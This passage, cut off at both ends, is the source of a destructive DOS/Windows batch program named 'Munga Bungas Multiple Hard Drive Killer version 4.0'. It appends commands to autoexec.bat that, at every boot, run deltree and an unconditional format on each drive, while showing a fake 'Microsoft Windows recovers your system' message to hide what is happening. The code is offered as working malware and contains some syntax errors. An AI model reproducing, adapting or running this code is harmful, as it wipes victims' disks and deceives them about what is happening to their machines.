sp;do call c://temp.bat %%%%a Bunga >nul >>c://autoexec.bat
echo cls >>c://autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:// >nul >>c://autoexec.bat
echo cls >>c://autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c://autoexec.bat
echo cls >>c://autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat
echo for %%%%a in (%drive%) do call c://temp.bat %%%%a Bunga >nul >>c://autoexec.bat
echo cls >>c://autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:// >nul >>c://autoexec.bat
echo cd// >>c://autoexec.bat
echo cls >>c://autoexec.bat
echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c://autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the follo